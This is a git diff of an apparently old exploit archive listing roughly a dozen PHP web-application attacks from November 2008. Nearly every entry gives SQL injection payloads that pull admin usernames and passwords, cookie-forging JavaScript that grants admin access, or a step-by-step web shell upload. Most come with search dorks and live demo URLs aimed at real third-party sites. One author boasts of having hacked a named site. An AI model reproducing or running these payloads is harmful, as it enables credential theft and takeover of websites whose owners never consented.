@@ -1,32 +1,31 @@ - -Downline Goldmine Builder (tr.php id) Remote SQL Injection Vulnerability -___________________________________ - -Author: Hussin X - -Home : www.IQ-TY.com & www.TrYaG.cc - -___________________________________ - -script :http://www.downlinegoldmine.com/ - -DorK :inurl:tr.php?id= - -Exploit : -_______ - -tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13-- - - - - - -Demo : -_______ - -http://www.downlinegoldmine.com/downlinebuilder/tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13-- - - -Greetz : All my freind - -# milw0rm.com [2008-11-01] +Downline Goldmine Builder (tr.php id) Remote SQL Injection Vulnerability +___________________________________ + +Author: Hussin X + +Home : www.IQ-TY.com & www.TrYaG.cc + +___________________________________ + +script :http://www.downlinegoldmine.com/ + +DorK :inurl:tr.php?id= + +Exploit : +_______ + +tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13-- + + + + + +Demo : +_______ + +http://www.downlinegoldmine.com/downlinebuilder/tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13-- + + +Greetz : All my freind + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6947.txt b/platforms/php/webapps/6947.txt index 0e68ab8cc..de604289b 100755 --- a/platforms/php/webapps/6947.txt +++ b/platforms/php/webapps/6947.txt 
@@ -1,33 +1,32 @@ - -Category Addon (tr.php id) Remote SQL Injection Vulnerability -___________________________________ - -Author: Hussin X - -Home : www.IQ-TY.com & www.TrYaG.cc - -___________________________________ - -script : http://www.downlinegoldmine.com/ - -DorK : inurl:tr.php?id= - -Exploit : -_______ - -tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13-- - - - -Demo : -_______ -http://www.downlinegoldmine.com/categoryaddon/tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13-- - - - - - - -Greetz : All my freind - -# milw0rm.com [2008-11-01] +Category Addon (tr.php id) Remote SQL Injection Vulnerability +___________________________________ + +Author: Hussin X + +Home : www.IQ-TY.com & www.TrYaG.cc + +___________________________________ + +script : http://www.downlinegoldmine.com/ + +DorK : inurl:tr.php?id= + +Exploit : +_______ + +tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13-- + + + +Demo : +_______ +http://www.downlinegoldmine.com/categoryaddon/tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13-- + + + + + + +Greetz : All my freind + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6948.txt b/platforms/php/webapps/6948.txt index 4b790e7b0..f8bddeeab 100755 --- a/platforms/php/webapps/6948.txt +++ b/platforms/php/webapps/6948.txt 
@@ -1,32 +1,31 @@ - -Classifieds Hosting( id ) Remote SQL Injection Vulnerability -___________________________________ - -Author: Hussin X - -Home : www.IQ-TY.com & www.TrYaG.cc - -___________________________________ - -script : http://www.yourfreeworld.com/script/classifiedshosting.php - -DorK : inurl:tr.php?id= Hosting - -Exploit : -_______ - -tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13,14+from+adminsettings-- - - -Demo : -_______ - -http://www.classyfied-ads.com/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13,14+from+adminsettings-- - - - - - -Greetz : All my freind - -# milw0rm.com [2008-11-01] +Classifieds Hosting( id ) Remote SQL Injection Vulnerability +___________________________________ + +Author: Hussin X + +Home : www.IQ-TY.com & www.TrYaG.cc + +___________________________________ + +script : http://www.yourfreeworld.com/script/classifiedshosting.php + +DorK : inurl:tr.php?id= Hosting + +Exploit : +_______ + +tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13,14+from+adminsettings-- + + +Demo : +_______ + +http://www.classyfied-ads.com/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13,14+from+adminsettings-- + + + + + +Greetz : All my freind + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6949.txt b/platforms/php/webapps/6949.txt index 71cbec10d..3cace5eda 100755 --- a/platforms/php/webapps/6949.txt +++ b/platforms/php/webapps/6949.txt 
@@ -1,32 +1,32 @@ -URL Rotator ( id ) Remote SQL Injection Vulnerability -___________________________________ - -Author: Hussin X - -Home : www.IQ-TY.com & www.TrYaG.cc - -___________________________________ - -script : http://www.yourfreeworld.com/script/urlrotator.php - -DorK : Copyright © Rotator 2008 - -Exploit : -_______ - -tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- - - -Demo : -_______ - -http://www.safelistadtrading.com/urlrotator/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- - - - - - - -Greetz : All my freind - -# milw0rm.com [2008-11-01] +URL Rotator ( id ) Remote SQL Injection Vulnerability +___________________________________ + +Author: Hussin X + +Home : www.IQ-TY.com & www.TrYaG.cc + +___________________________________ + +script : http://www.yourfreeworld.com/script/urlrotator.php + +DorK : Copyright © Rotator 2008 + +Exploit : +_______ + +tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- + + +Demo : +_______ + +http://www.safelistadtrading.com/urlrotator/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings-- + + + + + + +Greetz : All my freind + +# milw0rm.com [2008-11-01] diff --git a/platforms/php/webapps/6951.txt b/platforms/php/webapps/6951.txt index 98c087b5b..44f238097 100755 --- a/platforms/php/webapps/6951.txt +++ b/platforms/php/webapps/6951.txt 
@@ -1,32 +1,31 @@ - -newdownlinebuilder (tr.php id) Remote SQL Injection Vulnerability -___________________________________ - -Author: Hussin X - -Home : www.IQ-TY.com & www.TrYaG.cc - -___________________________________ - -script : http://www.downlinegoldmine.com/ - -DorK : inurl:tr.php?id= - -Exploit : -_______ - -tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13-- - - -Demo : -_______ - -http://www.downlinegoldmine.com/newdownlinebuilder/tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13-- - - - - - -Greetz : All my freind - -# milw0rm.com [2008-11-02] +newdownlinebuilder (tr.php id) Remote SQL Injection Vulnerability +___________________________________ + +Author: Hussin X + +Home : www.IQ-TY.com & www.TrYaG.cc + +___________________________________ + +script : http://www.downlinegoldmine.com/ + +DorK : inurl:tr.php?id= + +Exploit : +_______ + +tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13-- + + +Demo : +_______ + +http://www.downlinegoldmine.com/newdownlinebuilder/tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13-- + + + + + +Greetz : All my freind + +# milw0rm.com [2008-11-02] diff --git a/platforms/php/webapps/6952.txt b/platforms/php/webapps/6952.txt index b5b0523a0..8b4e3c3f0 100755 --- a/platforms/php/webapps/6952.txt +++ b/platforms/php/webapps/6952.txt 
@@ -1,27 +1,26 @@ - -Shopping Cart ( index.php c ) Blind SQL Injection Vulnerability -___________________________________ - -Author: Hussin X - -Home : www.IQ-TY.com & www.TrYaG.cc - -___________________________________ - -script :http://www.yourfreeworld.com/script/affiliateshoppingcart.php - -Demo : -_______ -true & false - -http://www.downlinegoldmine.com/shopcart/index.php?c=12+and+substring(@@version,1,1)=4 -http://www.downlinegoldmine.com/shopcart/index.php?c=12+and+substring(@@version,1,1)=5 - - - - -Greetz : All my freind - -Im TrYaGi - -# milw0rm.com [2008-11-02] +Shopping Cart ( index.php c ) Blind SQL Injection Vulnerability +___________________________________ + +Author: Hussin X + +Home : www.IQ-TY.com & www.TrYaG.cc + +___________________________________ + +script :http://www.yourfreeworld.com/script/affiliateshoppingcart.php + +Demo : +_______ +true & false + +http://www.downlinegoldmine.com/shopcart/index.php?c=12+and+substring(@@version,1,1)=4 +http://www.downlinegoldmine.com/shopcart/index.php?c=12+and+substring(@@version,1,1)=5 + + + + +Greetz : All my freind + +Im TrYaGi + +# milw0rm.com [2008-11-02] diff --git a/platforms/php/webapps/6953.txt b/platforms/php/webapps/6953.txt index d40a9d660..c3e1087e8 100755 --- a/platforms/php/webapps/6953.txt +++ b/platforms/php/webapps/6953.txt 
@@ -1,22 +1,22 @@ -# Maran PHP Shop (prod.php cat) SQL Injection Vulnerability -# url: http://www.maran.pamil-visions.com/maranshop.php -# -# Author: JosS -# mail: sys-project[at]hotmail[dot]com -# site: http://spanish-hackers.com -# team: Spanish Hackers Team - [SHT] -# -# This was written for educational purpose. Use it at your own risk. -# Author will be not responsible for any damage. - -PoC: /prod.php?cat=7['SQL] -ExP: /prod.php?cat=7+and+1=2++union+all+select+database()-- - -live demo: -http://www.heimanis.lv/prod.php?cat=7+and+1=2++union+all+select+database()-- - -output:~$ latvello_heimanis - -Hack0wn :D - -# milw0rm.com [2008-11-02] +# Maran PHP Shop (prod.php cat) SQL Injection Vulnerability +# url: http://www.maran.pamil-visions.com/maranshop.php +# +# Author: JosS +# mail: sys-project[at]hotmail[dot]com +# site: http://spanish-hackers.com +# team: Spanish Hackers Team - [SHT] +# +# This was written for educational purpose. Use it at your own risk. +# Author will be not responsible for any damage. + +PoC: /prod.php?cat=7['SQL] +ExP: /prod.php?cat=7+and+1=2++union+all+select+database()-- + +live demo: +http://www.heimanis.lv/prod.php?cat=7+and+1=2++union+all+select+database()-- + +output:~$ latvello_heimanis + +Hack0wn :D + +# milw0rm.com [2008-11-02] diff --git a/platforms/php/webapps/6954.txt b/platforms/php/webapps/6954.txt index 3e20bee8d..41aa351a3 100755 --- a/platforms/php/webapps/6954.txt +++ b/platforms/php/webapps/6954.txt 
@@ -1,25 +1,25 @@ -# Maran PHP Shop (admin.php) Insecure Cookie Handling Vulnerability -# url: http://www.maran.pamil-visions.com/maranshop.php -# -# Author: JosS -# mail: sys-project[at]hotmail[dot]com -# site: http://spanish-hackers.com -# team: Spanish Hackers Team - [SHT] -# -# This was written for educational purpose. Use it at your own risk. -# Author will be not responsible for any damage. - -vuln file: /admin.php -vuln code: -login here";exit;} -//echo $_COOKIE['user']; -?> - -exploit: -javascript:document.cookie = "user=demo; path=/"; - -Hack0wn :D - -# milw0rm.com [2008-11-02] +# Maran PHP Shop (admin.php) Insecure Cookie Handling Vulnerability +# url: http://www.maran.pamil-visions.com/maranshop.php +# +# Author: JosS +# mail: sys-project[at]hotmail[dot]com +# site: http://spanish-hackers.com +# team: Spanish Hackers Team - [SHT] +# +# This was written for educational purpose. Use it at your own risk. +# Author will be not responsible for any damage. + +vuln file: /admin.php +vuln code: +login here";exit;} +//echo $_COOKIE['user']; +?> + +exploit: +javascript:document.cookie = "user=demo; path=/"; + +Hack0wn :D + +# milw0rm.com [2008-11-02] diff --git a/platforms/php/webapps/6955.txt b/platforms/php/webapps/6955.txt index 2be67a5b1..3fca10f1c 100755 --- a/platforms/php/webapps/6955.txt +++ b/platforms/php/webapps/6955.txt 
@@ -1,57 +1,57 @@ -[~] Joovili Script Insecure Cookie Handling Vulnerability -[~] -[~] version: 3.1.4 -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 02.11.2008 -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] N0T: a.q kpss : ) ) -[~] -[~] ---------------------------------------------------------- - -demo admin login: - -http://demo.joovili.com/admin - -demo user login: - -http://demo.joovili.com/ - -demo staff login: - -http://demo.joovili.com/staff/ - - -exploit for user: - -javascript:document.cookie = "session_id=real_id; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=real_user_name; path=/"; - - -for demo user: - -javascript:document.cookie = "session_id=304; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=demo; path=/"; - -for demo admin: - -javascript:document.cookie = "session_admin_id=1; path=/"; document.cookie = "session_admin_username=admin; path=/"; document.cookie = "session_admin=true; path=/"; - -for demo staff: - -javascript:document.cookie = "session_staff_id=3; path=/"; document.cookie = "session_staff_username=staff; path=/"; document.cookie = "session_staff=true; path=/"; - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & all Muslim HaCkeRs -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-11-02] +[~] Joovili Script Insecure Cookie Handling Vulnerability +[~] +[~] version: 3.1.4 +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 02.11.2008 +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( 
+[~] +[~] N0T: a.q kpss : ) ) +[~] +[~] ---------------------------------------------------------- + +demo admin login: + +http://demo.joovili.com/admin + +demo user login: + +http://demo.joovili.com/ + +demo staff login: + +http://demo.joovili.com/staff/ + + +exploit for user: + +javascript:document.cookie = "session_id=real_id; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=real_user_name; path=/"; + + +for demo user: + +javascript:document.cookie = "session_id=304; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=demo; path=/"; + +for demo admin: + +javascript:document.cookie = "session_admin_id=1; path=/"; document.cookie = "session_admin_username=admin; path=/"; document.cookie = "session_admin=true; path=/"; + +for demo staff: + +javascript:document.cookie = "session_staff_id=3; path=/"; document.cookie = "session_staff_username=staff; path=/"; document.cookie = "session_staff=true; path=/"; + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke & all Muslim HaCkeRs +[~] +[~] yildirimordulari.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-11-02] diff --git a/platforms/php/webapps/6956.txt b/platforms/php/webapps/6956.txt index 1a9f47881..27f5fe866 100755 --- a/platforms/php/webapps/6956.txt +++ b/platforms/php/webapps/6956.txt 
@@ -1,133 +1,133 @@ -[~] Apartment Search Script Multiple Remote Vuln. -[~] -[~] Remote File Upload & XSS -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 02.11.2008 -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] dork: allinurl:"listtest.php?r=" ( cok site var sömürün : ) ) -[~] -[~] ---------------------------------------------------------- - -exploit: - -http://localhost/script_path/Member_Admin/logo/[id]your_shell.php - -XSS - -http://localhost/script_path/listtest.php?r="> - -example 1 (demo): - -http://www.downlinegoldmine.com/apartment/Member_Admin/logo/b50f9cbff100ae4e8a581a9f1a8shell.php - -example 2: - -http://www.apt.cc/Member_Admin/logo/cca55760b985b02c1b9d7fac606shell.php - -XSS example: - -http://www.apt.cc/listtest.php?r="> - ---------------------------------------------------------------------------- - -you must have a minimal shell ( example 40 kb ) (kucuk bir shell in olmalI ) - -and you add this code your shell to head - -GIF89a; (en uste bu kodu ekle ) - -example your_shell.php: - -GIF89a; - - -and save your_sheell.php ( isim ver ve kaydet ) - ----------------------------------------------------------------------------- - -you must register to site ( direckt register link: http://localhost/script_path/registerlandlord.php ) ( siteye uye ol ) - -and login ( direckt link: http://localhost/script_path/Member_Admin/index.php ) ( giris yap ) - -after edit your banner ( direckt link: http://localhost/script_path/Member_Admin/editimage.php?clientid=[MemberAdminPass] ) - -or first click "Edit Account Info" after click "Your Logo" Edit button ( "Edit Account Info" yazýsýna tIkla sonra da edit butonuna tIkla ) - -and open new page. you click gozat button and select your_sheell.php ( acIlan yeni sayfada senin hazIr shell i upload et ) - -after click to submit button. 
you should see "Your image will be review." ( "Your image will be review." bu yazIyI gormelisin ) - -if you see "Your image will be review." your shell upload succesfull. ( gorduysen yukleme basarIlI ) - -after repeat click to "Edit Account Info" and open page. your logo right click and properties select this link copy - -after paste your explorer go your_shell.php ( sonra yine "Edit Account Info" yazIsIna Týkla - -acIlan sayfada logonun ustunde sag tIkla ozellikleri Týkla linki kopyala sonrada shelle ulas ) - - -your_shell.php - -http://localhost/script_path/Member_Admin/logo/[id]your_shell.php - -------------------------------------------------------------------------------- - -example 1 (demo): - -http://www.downlinegoldmine.com/apartment/Member_Admin/index.php - -email: zorlu@w.cn - -password: 123456 - -or direckt going: http://www.downlinegoldmine.com/apartment/Member_Admin/login.php?c=4806666 - -edit logo: http://www.downlinegoldmine.com/apartment/Member_Admin/editimage.php?clientid=4806666 - -and shell.php - -http://www.downlinegoldmine.com/apartment/Member_Admin/logo/b50f9cbff100ae4e8a581a9f1a8shell.php - - -example 2: - -http://www.apt.cc/Member_Admin/index.php - -email: zorlu@w.cn - -password: 123456 - -or direckt going: http://www.apt.cc/Member_Admin/login.php?c=4871187 - -edit logo: http://www.apt.cc/Member_Admin/editimage.php?clientid=4871187 - -and shell.php - -http://www.apt.cc/Member_Admin/logo/cca55760b985b02c1b9d7fac606shell.php - - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & all Muslim HaCkeRs -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-11-02] +[~] Apartment Search Script Multiple Remote Vuln. 
+[~] +[~] Remote File Upload & XSS +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 02.11.2008 +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] dork: allinurl:"listtest.php?r=" ( cok site var sömürün : ) ) +[~] +[~] ---------------------------------------------------------- + +exploit: + +http://localhost/script_path/Member_Admin/logo/[id]your_shell.php + +XSS + +http://localhost/script_path/listtest.php?r="> + +example 1 (demo): + +http://www.downlinegoldmine.com/apartment/Member_Admin/logo/b50f9cbff100ae4e8a581a9f1a8shell.php + +example 2: + +http://www.apt.cc/Member_Admin/logo/cca55760b985b02c1b9d7fac606shell.php + +XSS example: + +http://www.apt.cc/listtest.php?r="> + +--------------------------------------------------------------------------- + +you must have a minimal shell ( example 40 kb ) (kucuk bir shell in olmalI ) + +and you add this code your shell to head + +GIF89a; (en uste bu kodu ekle ) + +example your_shell.php: + +GIF89a; + + +and save your_sheell.php ( isim ver ve kaydet ) + +---------------------------------------------------------------------------- + +you must register to site ( direckt register link: http://localhost/script_path/registerlandlord.php ) ( siteye uye ol ) + +and login ( direckt link: http://localhost/script_path/Member_Admin/index.php ) ( giris yap ) + +after edit your banner ( direckt link: http://localhost/script_path/Member_Admin/editimage.php?clientid=[MemberAdminPass] ) + +or first click "Edit Account Info" after click "Your Logo" Edit button ( "Edit Account Info" yazýsýna tIkla sonra da edit butonuna tIkla ) + +and open new page. you click gozat button and select your_sheell.php ( acIlan yeni sayfada senin hazIr shell i upload et ) + +after click to submit button. you should see "Your image will be review." ( "Your image will be review." 
bu yazIyI gormelisin ) + +if you see "Your image will be review." your shell upload succesfull. ( gorduysen yukleme basarIlI ) + +after repeat click to "Edit Account Info" and open page. your logo right click and properties select this link copy + +after paste your explorer go your_shell.php ( sonra yine "Edit Account Info" yazIsIna Týkla + +acIlan sayfada logonun ustunde sag tIkla ozellikleri Týkla linki kopyala sonrada shelle ulas ) + + +your_shell.php + +http://localhost/script_path/Member_Admin/logo/[id]your_shell.php + +------------------------------------------------------------------------------- + +example 1 (demo): + +http://www.downlinegoldmine.com/apartment/Member_Admin/index.php + +email: zorlu@w.cn + +password: 123456 + +or direckt going: http://www.downlinegoldmine.com/apartment/Member_Admin/login.php?c=4806666 + +edit logo: http://www.downlinegoldmine.com/apartment/Member_Admin/editimage.php?clientid=4806666 + +and shell.php + +http://www.downlinegoldmine.com/apartment/Member_Admin/logo/b50f9cbff100ae4e8a581a9f1a8shell.php + + +example 2: + +http://www.apt.cc/Member_Admin/index.php + +email: zorlu@w.cn + +password: 123456 + +or direckt going: http://www.apt.cc/Member_Admin/login.php?c=4871187 + +edit logo: http://www.apt.cc/Member_Admin/editimage.php?clientid=4871187 + +and shell.php + +http://www.apt.cc/Member_Admin/logo/cca55760b985b02c1b9d7fac606shell.php + + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke & all Muslim HaCkeRs +[~] +[~] yildirimordulari.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-11-02] diff --git a/platforms/php/webapps/6957.txt b/platforms/php/webapps/6957.txt index d0839df93..ee92700fa 100755 --- a/platforms/php/webapps/6957.txt +++ b/platforms/php/webapps/6957.txt 
@@ -1,20 +1,19 @@ - -# ----------------------------------------------------------------- -# NetRisk <= 2.0 (XSS/SQL Injection) Remote Vulnerabilities -# ----------------------------------------------------------------- -# Discovered By StAkeR aka athos -# Download On http://downloads.sourceforge.net/netrisk -# Works Regardless Of php.ini Settings! -# ----------------------------------------------------------------- - -# Cross Site Scripting -# index.php?error= - -# Remote SQL Injection -# index.php?p=profile&id=1+union+all+select+0,0,concat(login,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0+from+netrisk_users+where+id=1/* -# index.php?p=profile&id=1+union+all+select+0,0,load_file(0x2F6574632F706173737764),0,0,0,0,0,0,0,0,0,0,0,0/* - -# Remote Blind SQL Injection -# index.php?p=game&id=1 and ascii(substring((select password from netrisk_users where id=1),1,1))=[ascii]/* - -# milw0rm.com [2008-11-02] +# ----------------------------------------------------------------- +# NetRisk <= 2.0 (XSS/SQL Injection) Remote Vulnerabilities +# ----------------------------------------------------------------- +# Discovered By StAkeR aka athos +# Download On http://downloads.sourceforge.net/netrisk +# Works Regardless Of php.ini Settings! +# ----------------------------------------------------------------- + +# Cross Site Scripting +# index.php?error= + +# Remote SQL Injection +# index.php?p=profile&id=1+union+all+select+0,0,concat(login,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0+from+netrisk_users+where+id=1/* +# index.php?p=profile&id=1+union+all+select+0,0,load_file(0x2F6574632F706173737764),0,0,0,0,0,0,0,0,0,0,0,0/* + +# Remote Blind SQL Injection +# index.php?p=game&id=1 and ascii(substring((select password from netrisk_users where id=1),1,1))=[ascii]/* + +# milw0rm.com [2008-11-02] diff --git a/platforms/php/webapps/6958.txt b/platforms/php/webapps/6958.txt index 82c3d91e0..883b425c6 100755 --- a/platforms/php/webapps/6958.txt +++ b/platforms/php/webapps/6958.txt 
@@ -1,30 +1,30 @@ -[~]------------------------------------------------------------------------------------------------------------- - -[~] Maran PHP Shop (prodshow.php) SQL Injection Vulnerability -[~] -[~] http://www.maran.pamil-visions.com/maranshop.php -[~] -[~] -[~] ------------------------------------------------------------------------------------------------------------ -[~] Bug founded by d3v1l [Avram Marius] -[~] -[~] Date: 12.10.2008 -[~] -[~] -[~] d3v1l@spoofer.com http://security-sh3ll.com -[~] -[~] ------------------------------------------------------------------------------------------------------------ -[~] Greetz tO ALL:- -[~] -[~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) -[~] -[~] milw0rm staff -[~]------------------------------------------------------------------------------------------------------------- -[~] Exploit :- -[~] -[~] http://site.com/prodshow.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7 -[~] -[~] http://site.com/prodshow.php?id=1 UNION SELECT 1,concat(user_password,char(58),user_name),3,4,5,6,7 FROM administrators -[~]---------------------------------------------------------------------------------------------------------------------- - -# milw0rm.com [2008-11-02] +[~]------------------------------------------------------------------------------------------------------------- + +[~] Maran PHP Shop (prodshow.php) SQL Injection Vulnerability +[~] +[~] http://www.maran.pamil-visions.com/maranshop.php +[~] +[~] +[~] ------------------------------------------------------------------------------------------------------------ +[~] Bug founded by d3v1l [Avram Marius] +[~] +[~] Date: 12.10.2008 +[~] +[~] +[~] d3v1l@spoofer.com http://security-sh3ll.com +[~] +[~] ------------------------------------------------------------------------------------------------------------ +[~] Greetz tO ALL:- +[~] +[~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) +[~] +[~] milw0rm staff 
+[~]------------------------------------------------------------------------------------------------------------- +[~] Exploit :- +[~] +[~] http://site.com/prodshow.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7 +[~] +[~] http://site.com/prodshow.php?id=1 UNION SELECT 1,concat(user_password,char(58),user_name),3,4,5,6,7 FROM administrators +[~]---------------------------------------------------------------------------------------------------------------------- + +# milw0rm.com [2008-11-02] diff --git a/platforms/php/webapps/6960.txt b/platforms/php/webapps/6960.txt index fd22c8956..a6d81b002 100755 --- a/platforms/php/webapps/6960.txt +++ b/platforms/php/webapps/6960.txt 
@@ -1,36 +1,36 @@ -################################################################## -# -# Author: TR-ShaRk -# -###################### -# -# Web : StarHack.Us OldKral.Com -# -###################### -# -# Emai : Admin@tr-shark.org -# -###################### -# -# Script price : 19,00€ -# -# Here:http://1st-scripts.de/products.php?id=18&associate= -# -# -###################### -# -# SQL Injection Vuln. : -# products.php?id=00+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+bb1_users-- -# -# -###################### -# -# Demo: -# -# http://1st-scripts.de/products.php?id=00+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+bb1_users-- -# -###################### -SEHITLER ÖLMEZ VATAN BÖLÜNMEZ -Greetz: STR0KE , WEBLOADER , REALWOLKER , KOMANDO , CEYPOWER , ARANELWORM , MYSTICAL_DEWIL - -# milw0rm.com [2008-11-02] +################################################################## +# +# Author: TR-ShaRk +# +###################### +# +# Web : StarHack.Us OldKral.Com +# +###################### +# +# Emai : Admin@tr-shark.org +# +###################### +# +# Script price : 19,00€ +# +# Here:http://1st-scripts.de/products.php?id=18&associate= +# +# +###################### +# +# SQL Injection Vuln. : +# products.php?id=00+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+bb1_users-- +# +# +###################### +# +# Demo: +# +# http://1st-scripts.de/products.php?id=00+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+bb1_users-- +# +###################### +SEHITLER ÖLMEZ VATAN BÖLÜNMEZ +Greetz: STR0KE , WEBLOADER , REALWOLKER , KOMANDO , CEYPOWER , ARANELWORM , MYSTICAL_DEWIL + +# milw0rm.com [2008-11-02] diff --git a/platforms/php/webapps/6962.txt b/platforms/php/webapps/6962.txt index d89bbf854..4fcf9a6e7 100755 --- a/platforms/php/webapps/6962.txt +++ b/platforms/php/webapps/6962.txt 
@@ -1,45 +1,45 @@ -[~] Powered by BosClassifieds remote sql inj -[~] -[~] index.php (catid_id) -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 03.11.2008 -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] N0T: a.q kpss yuzden nete ara verebilirim : ( -[~] -[~] ----------------------------------------------------------- - -Exploit: - -http://localhost/script_path/index.php?cat_id=[SQL] - -[SQL]= - --9999+union+select+concat(username,0x3a,password)+from+bosdevUUS-- - -example 1: ( you must look title ) - -http://myvaldosta.com/bosclass/index.php?cat_id=-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS-- - -( bunu ben hackledim canIm sIkILIyodu : ) anasayfayI kontrol edin http://myvaldosta.com ) - -example 2: ( you must look title ) - -http://wikiventa.com/index.php?cat_id=-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS-- - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & all Muslim HaCkeRs -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-11-03] +[~] Powered by BosClassifieds remote sql inj +[~] +[~] index.php (catid_id) +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 03.11.2008 +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] N0T: a.q kpss yuzden nete ara verebilirim : ( +[~] +[~] ----------------------------------------------------------- + +Exploit: + +http://localhost/script_path/index.php?cat_id=[SQL] + +[SQL]= + +-9999+union+select+concat(username,0x3a,password)+from+bosdevUUS-- + +example 1: ( you must look title ) + 
